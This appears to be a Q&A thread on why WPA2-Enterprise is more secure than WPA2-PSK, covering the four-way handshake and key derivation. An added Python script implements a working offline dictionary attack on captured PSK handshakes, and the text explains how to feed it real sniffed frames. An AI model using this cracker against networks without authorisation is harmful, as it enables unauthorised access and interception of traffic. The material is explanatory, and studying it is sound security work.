Does using WPA2-Enterprise just change the attack model vs WPA2-PSK?

WPA2-Enterprise is (in my opinion) considerably more secure than PSK. Reasons:

  • WPA2-PSK has a single shared key amongst all devices. That means that if one of the devices is compromised the key is lost, so the more devices you have, the greater the risk of loss or compromise. As against this, WPA2-Enterprise has per-user secrets, so it does not have the same problem.
  • Using WPA2-Enterprise each user can change their credentials as required, whereas with WPA2-PSK changing the secret could be a major undertaking, depending on the size and make-up of the user/device population. This increases the potential severity of a compromise as key rotation will be much slower (in most cases) than password rotation so if a credential is compromised, it's likely to remain so for longer with PSK.
  • With WPA2-Enterprise you can make use of stronger authentication mechanisms (e.g. 2-factor if needed)
  • With WPA2-Enterprise you can add certificate authentication to stop random attackers brute-forcing the users' creds to get access.

To answer your question, you really need to understand a little bit about how WPA2 works.

To start with, both sides need a common starting point (the "Pairwise Master Key" or PMK) on which to build the encryption key ("Pairwise Transient Key" or PTK). This PMK is either the PSK for WPA2-PSK or it is generated by the RADIUS server during the EAP exchange for WPA2-Enterprise.

The PTK is created by combining and hashing the following values: the PMK, the authenticator nonce value or ANonce, the supplicant nonce value or SNonce, the MAC address of the AP (BSSID), and finally the MAC address of the station.

The information for the PTK is exchanged in a four-way handshake:

  1. After the station authenticates, the AP will send the ANonce to the station.
  2. The station responds with the SNonce plus a MIC (message integrity code).
  3. The AP then responds to the station with the GTK (group temporal key - used for broadcast/multicast) and a MIC.
  4. The station sends an acknowledgement to the AP.

Once this is done, both the station and the AP have been able to generate the PTK and know that the other side has been able to do so as well.

What makes WPA2-Enterprise so much more secure than WPA2-PSK, is that each and every authenticated station will have a unique PMK, and the PMK will be unique every time the station connects. So even if someone were to brute force the PTK and calculate the PMK, this would only apply to the single station and only until it reconnects.

With WPA2-PSK, once the attacker has calculated the PMK (in this case the PSK), as long as it can capture the four-way handshakes between the station(s) and AP, it can decrypt all the data on the wireless network. This is often done by spoofing a deauthentication frame to the stations, causing them to reconnect.


In Personal Mode or Pre-shared Key (PSK), all users share the same secret key, which is 256 bits, generated from a pass-phrase of 8 to 64 characters. WPA2 uses strong encryption protocols which may be potentially uncrackable when a sufficiently long and securely generated pass-phrase is used. Otherwise, the shared secret can be found by capturing the four-way handshake and computing all possible combinations. If the brute force/dictionary attack is successful (probably due to a weak key that can be found in rainbow tables) then all the future/past communications may be compromised. Another drawback is that all users may need to change the secret key if an employee who knows the secret key leaves the organization.

In Enterprise Mode or RADIUS Mode, an external RADIUS or AAA server is used for authentication. Each user may be issued with unique login credentials (including certificate). Therefore even if you were to brute force and somehow obtain the password of a user, only that user is affected. This unique username and password scheme is also scalable as user accounts can be easily added or removed from the network.

The Enterprise mode is based on the IEEE 802.1X authentication standard and uses the Extensible Authentication Protocol (EAP) with many variants. If EAP-TLS and certificates are used (generally regarded as the most secure but troublesome to deploy) then the brute-forcing method will be even harder since you now need to break asymmetric schemes like RSA (based on the assumption that integer factorization is a hard problem, which has survived over 20 years of scrutiny) instead of simply brute-forcing a potentially "weaker" pass-phrase. With a client-side certificate, a compromised password alone is not enough to break the EAP scheme because the client's private key is also needed.

Therefore, WPA2 Enterprise is clearly more secure and scalable than the PSK version.
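The following Python script is an added worked example, not part of any of the answers above, that ties together the two mechanisms the second and third answers describe: the PSK-to-PMK derivation (PBKDF2 over the passphrase and SSID), the PTK derivation from PMK, the two MAC addresses and the two nonces, and the offline dictionary attack that checks each candidate passphrase against the MIC in message 2 of the four-way handshake. It then runs the same attack against a handshake whose PMK did not come from a passphrase, which is the WPA2-Enterprise case, to show why the captured handshake is useless there. Everything the sniffer would normally capture (SSID, BSSID, station MAC, nonces, the RSN IE in message 2, the wordlist) is constructed inline, the "captured" frame is generated by playing the station ourselves, and the Enterprise PMK is a fixed constructed value standing in for the first 256 bits of the EAP MSK. The EAPOL-Key frame layout, the PRF-512 construction and the HMAC-SHA1-128 MIC are those of 802.11i for CCMP (key descriptor version 2).

```python
import hashlib
import hmac
from typing import Optional

# Offset of the Key MIC field in an EAPOL-Key frame: 4-byte 802.1X header, then
# descriptor type(1) key info(2) key length(2) replay counter(8) nonce(32)
# key IV(16) key RSC(8) key ID(8) = 81.
MIC_OFFSET = 81
KEY_INFO_MSG2 = 0x010A  # descriptor version 2 (HMAC-SHA1-128/AES), Pairwise, MIC bit set
# Constructed RSN IE as a station would send in message 2: CCMP group/pairwise, PSK AKM.
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")


def derive_pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK == PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1 blocks over label || 0x00 || data || counter, cut to 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs and of the nonces)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def build_eapol_key_frame(key_info: int, replay_counter: int, nonce: bytes,
                          key_data: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key (RSN descriptor) frame; the MIC field is supplied by the caller."""
    body = (
        b"\x02"                              # descriptor type: RSN
        + key_info.to_bytes(2, "big")
        + (16).to_bytes(2, "big")            # key length: 16 for CCMP
        + replay_counter.to_bytes(8, "big")
        + nonce
        + b"\x00" * 16                       # key IV (unused with descriptor version 2)
        + b"\x00" * 8                        # key RSC
        + b"\x00" * 8                        # reserved (key ID)
        + mic
        + len(key_data).to_bytes(2, "big")
        + key_data
    )
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v2, type 3 = EAPOL-Key


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key MIC (descriptor version 2): HMAC-SHA1 over the frame with the MIC zeroed, first 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def station_message2(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Message 2 as the station sends it: SNonce plus a MIC computed with KCK = PTK[0:16]."""
    kck = derive_ptk(pmk, aa, spa, anonce, snonce)[:16]
    frame = build_eapol_key_frame(KEY_INFO_MSG2, 1, snonce, RSN_IE)
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def crack_psk(ssid: str, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes,
              msg2: bytes, wordlist) -> Optional[str]:
    """Offline dictionary attack: PMK -> PTK -> MIC per candidate, compared with the captured MIC."""
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = derive_pmk_from_passphrase(candidate, ssid)
        kck = derive_ptk(pmk, aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), captured_mic):
            return candidate
    return None


def run_demo():
    # Constructed stand-ins for what a sniffer sees: SSID, BSSID, station MAC, both nonces.
    ssid = "CorpWiFi"
    aa = bytes.fromhex("001122334455")
    spa = bytes.fromhex("66778899aabb")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    wordlist = ["password", "letmein1", "correct horse", "Summer2014"]

    # PSK network: the PMK is a function of the passphrase, so the handshake is a crackable hash.
    psk_msg2 = station_message2(derive_pmk_from_passphrase("correct horse", ssid),
                                aa, spa, anonce, snonce)
    psk_result = crack_psk(ssid, aa, spa, anonce, snonce, psk_msg2, wordlist)

    # Enterprise network: the PMK is the first 256 bits of the per-session EAP MSK and is not
    # derived from any passphrase. A fixed constructed value stands in for it here.
    enterprise_pmk = hashlib.sha256(b"constructed stand-in for an EAP MSK").digest()
    ent_msg2 = station_message2(enterprise_pmk, aa, spa, anonce, snonce)
    ent_result = crack_psk(ssid, aa, spa, anonce, snonce, ent_msg2, wordlist)
    return psk_result, ent_result


if __name__ == "__main__":
    psk, ent = run_demo()
    print("PSK handshake, passphrase recovered:", psk)
    print("Enterprise handshake, passphrase recovered:", ent)
```

Against a real capture you would take the BSSID, station MAC, ANonce (from message 1), SNonce and MIC (from message 2) from the sniffed frames instead of constructing them, and feed `crack_psk` the raw message 2 bytes. Note that the only per-candidate work in the loop that is genuinely expensive is the 4096-iteration PBKDF2; the PTK and MIC steps are a handful of HMACs, which is why PSK cracking cost is dominated by passphrase entropy and why the Enterprise handshake, whose PMK has no passphrase behind it, gives the attacker nothing to iterate over.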